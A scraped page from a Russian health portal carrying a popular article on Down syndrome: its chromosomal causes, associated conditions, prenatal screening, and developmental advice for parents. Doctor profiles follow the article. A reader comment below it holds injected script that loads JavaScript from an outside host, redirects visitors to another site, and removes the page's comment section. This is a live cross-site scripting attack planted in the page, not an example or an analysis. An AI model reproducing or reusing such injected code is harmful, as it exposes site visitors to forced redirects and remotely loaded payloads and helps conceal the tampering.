Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Другие дети: синдром Даун...  >>  Другие дети: синдром Дауна
 
Обратная связь
 

Другие дети: синдром Дауна

Размер шрифта
20 марта 2012 10:00
  • google_analytics: false
  • Нравится

Если вы думаете, что синдром Дауна – наследственное заболевание, вы ошибаетесь. Как правильно развивать необычного ребенка, чтобы ему легче было в этом мире?

1 

Бостонский проект – один из самых знаменитых проектов, направленных на адаптацию детей с синдромом Дауна, доказал, что если у таких детей есть родители и они живут в семье, если их любят и правильно развивают, то такие дети способны успешно учится в обычных школах и их жизнь складывается как у обычных людей.

Суть болезни

В норме у каждого человека 46 хромосом, а в половых клетках у мужчин и женщин, соответственно, по 23 хромосомы. В каждой клетке плода каждой хромосомы должно быть по две. Синдром Дауна характеризуется тем, что во время деления клеток в них появляется лишняя хромосома, потому что 21-я хромосома у матери или отца по какой-то причине не делится на две хромосомы и плод получает дополнительную одну хромосому. Это явление врачи называют трисомией – три хромосомы вместо двух. Этот вариант деления хромосом распространен в 95% случаев.

Существуют и менее распространенные формы синдрома Дауна: мозаичный вариант синдрома, когда не во всех клетках организма есть третья дополнительная хромосома и транслокация части 21-й хромосомы на другие хромосомы в клетке, когда в ней появляются две полные хромосомы и один кусочек.

Избыток хромосом ведет не только к особой внешности – широко поставленные глаза, широкая переносица, большой язык, который не всегда помещается во рту – но и к ряду особенностей в развитии и болезней у таких людей. У людей с синдромом Дауна чаще встречаются:

  • эндокринологические заболевания;
  • пороки сердца;
  • средняя продолжительность жизни меньше – в среднем 49 лет.

Диагностика

Примерно в 14-18 недель специальная диагностика, которая в России абсолютно бесплатна и проводится в рамках национальной программы, дает понять, есть ли врожденные аномалии, в том числе и синдром Дауна, у будущего ребенка. Частота рождения детей с синдромом Дауна такова: 1 ребенок на 1500 родов.

Как лечить

Самое важное в лечении синдрома Дауна – обеспечение правильного развития этих детей. В обучении таких детей нужно помнить, что важным для них является зрительно-тактильное восприятие мира.

Поэтому нужно развивать:

  • мелкую моторику, в игре используя конструктор или другие наборы с деталями;
  • двуручную деятельность, когда задействованы обе руки;
  • тактильное восприятие за счет различных материалов, из которых изготовлены игрушки;
  • музыкальный слух и способность рисовать.

Все, что дети делают руками, нужно развивать, потому что в этом случае напрямую развивается их мозг. И конечно же нужно заботиться о таких необычных детях и уделять много внимания их здоровью.

Синдром Дауна – не болезнь, а особое состояние, которое требует от людей особого отношения, только и всего.
 

 
Сюжеты по теме:

Хромосомный перебор. Синдром Дауна

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.